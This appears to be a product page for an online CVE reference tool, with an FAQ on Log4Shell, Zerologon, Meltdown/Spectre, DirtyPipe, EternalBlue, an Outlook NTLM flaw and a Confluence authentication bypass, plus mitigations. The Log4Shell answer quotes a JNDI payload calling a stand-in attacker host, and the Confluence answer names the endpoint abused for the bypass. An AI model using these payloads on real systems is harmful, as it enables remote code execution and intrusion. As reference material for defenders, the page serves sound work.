liminfo

CVE Database Guide

Free reference guide: CVE Database Guide

25 results

About CVE Database Guide

The CVE Vulnerability Reference is a free online security tool cataloging over 25 critical Common Vulnerabilities and Exposures (CVEs) organized into six categories: Web vulnerabilities (Log4Shell CVE-2021-44228, ProxyShell CVE-2021-34473, MOVEit CVE-2023-34362, PAN-OS CVE-2024-3400), Network vulnerabilities (Zerologon CVE-2020-1472, EternalBlue CVE-2017-0144, Heartbleed CVE-2014-0160, FortiGate CVE-2023-27997), OS vulnerabilities (DirtyPipe CVE-2022-0847, PwnKit CVE-2021-4034, DirtyCow CVE-2016-5195, PrintNightmare CVE-2021-1675), Application vulnerabilities, Service vulnerabilities, and Hardware vulnerabilities (Meltdown, Spectre).

This reference is designed for security professionals, penetration testers, SOC analysts, system administrators, and compliance officers who need quick access to information about high-impact vulnerabilities. Each CVE entry includes the CVE identifier and common name, a description of the vulnerability mechanism, CVSS severity score, affected software versions, example exploit commands or attack vectors, and recommended mitigation steps including specific patches and configuration changes.

All vulnerability data is loaded client-side with instant search by CVE number (e.g. CVE-2021-44228), common name (e.g. Log4Shell), or keyword. Six-category filtering helps narrow results to Web, Network, OS, Application, Service, or Hardware vulnerabilities. The reference is available in both Korean and English. No login or installation is required, and the entire database works offline after page load.

Key Features

  • Over 25 critical CVEs with CVSS scores, exploit details, affected versions, and mitigation steps
  • Six-category classification: Web, Network, OS, Application, Service, Hardware
  • Web CVEs: Log4Shell (CVSS 10.0), ProxyShell, MOVEit Transfer SQL injection, PAN-OS command injection
  • Network CVEs: Zerologon (CVSS 10.0), EternalBlue, Heartbleed, FortiGate SSL-VPN heap overflow
  • OS CVEs: DirtyPipe, PwnKit, DirtyCow, PrintNightmare with exploit examples and patch references
  • Hardware CVEs: Meltdown, Spectre v1, Spectre v4, Spectre-BHB with microcode and kernel mitigations
  • Instant search by CVE number, common name (Log4Shell, Zerologon), or keyword
  • Bilingual Korean and English with fully offline-capable mobile-responsive design

Frequently Asked Questions

What is CVE-2021-44228 (Log4Shell)?

Log4Shell is a critical remote code execution vulnerability (CVSS 10.0) in Apache Log4j2 versions 2.0-beta9 through 2.14.1. An attacker can trigger arbitrary code execution by sending a crafted JNDI lookup string (e.g. ${jndi:ldap://attacker.com/exploit}) to any application that logs user-controlled input using Log4j2. The vulnerability is exploited via the JNDI (Java Naming and Directory Interface) feature. Mitigation requires updating to Log4j 2.17.0 or later.

What is CVE-2020-1472 (Zerologon)?

Zerologon (CVSS 10.0) is a critical vulnerability in the Windows Netlogon Remote Protocol (MS-NRPC) that allows an attacker to establish a Netlogon secure channel connection to a domain controller using all-zero challenge bytes due to a cryptographic flaw in the AES-CFB8 implementation. This enables domain admin privilege escalation from an unauthenticated network position. All Windows Server versions are affected. Mitigation requires applying the KB4571702 patch.

What is the difference between Meltdown and Spectre?

Meltdown (CVE-2017-5754) exploits a flaw in Intel CPU out-of-order execution to read kernel memory from user space, bypassing memory isolation. It primarily affects Intel CPUs and is mitigated by KPTI (Kernel Page Table Isolation) patches. Spectre (CVE-2017-5753 for v1, CVE-2018-3639 for v4) exploits branch prediction and speculative execution to leak data across process boundaries. Spectre affects Intel, AMD, and ARM CPUs and requires a combination of microcode updates and compiler patches. Spectre is generally harder to exploit but also harder to fully mitigate.

What is CVE-2022-0847 (DirtyPipe)?

DirtyPipe is a Linux kernel privilege escalation vulnerability (CVSS 7.8) affecting Linux kernel versions 5.8 through 5.16.10. It allows an unprivileged local user to overwrite data in read-only files, including SUID binaries, by exploiting a flaw in the pipe subsystem where the PIPE_BUF_FLAG_CAN_MERGE flag was not properly cleared. This enables writing arbitrary data to any file, including /etc/passwd, to gain root access. The fix is included in kernel version 5.16.11 and later.

How do I search for a specific CVE?

You can search by CVE number (e.g. CVE-2021-44228), common vulnerability name (e.g. Log4Shell, Zerologon, EternalBlue, DirtyPipe), affected software name (e.g. Exchange, FortiOS, Confluence), or general keyword (e.g. RCE, SQL injection, privilege escalation). Use the category filter to narrow results to Web, Network, OS, Application, Service, or Hardware vulnerabilities.

What is CVE-2017-0144 (EternalBlue)?

EternalBlue is a remote code execution vulnerability in Microsoft SMBv1 (Server Message Block version 1) affecting Windows XP through Windows Server 2008 R2. Originally developed as an NSA exploit and leaked by the Shadow Brokers group, it was infamously used by the WannaCry ransomware in 2017. The vulnerability allows remote code execution without authentication by sending crafted SMB packets. Mitigation requires applying the MS17-010 patch and disabling SMBv1.

What is CVE-2023-23397 (Outlook NTLM relay)?

CVE-2023-23397 (CVSS 9.8) is a critical Microsoft Outlook vulnerability that enables NTLM hash theft via a specially crafted calendar invitation. The attack requires no user interaction — simply receiving the malicious email triggers the vulnerability. The victim's NTLM authentication hash is sent to an attacker-controlled server, enabling relay attacks or offline cracking. Mitigation requires updating Outlook and blocking outbound SMB traffic (port 445) at the network perimeter.

What is CVE-2023-22515 (Confluence auth bypass)?

CVE-2023-22515 (CVSS 10.0) is a critical authentication bypass vulnerability in Atlassian Confluence Data Center and Server. An attacker can create administrator accounts without authentication by sending crafted POST requests to /setup/setupadministrator.action, effectively re-triggering the initial setup wizard on a production instance. This was actively exploited in the wild. Mitigation requires immediate patching and restricting access to Confluence instances from untrusted networks.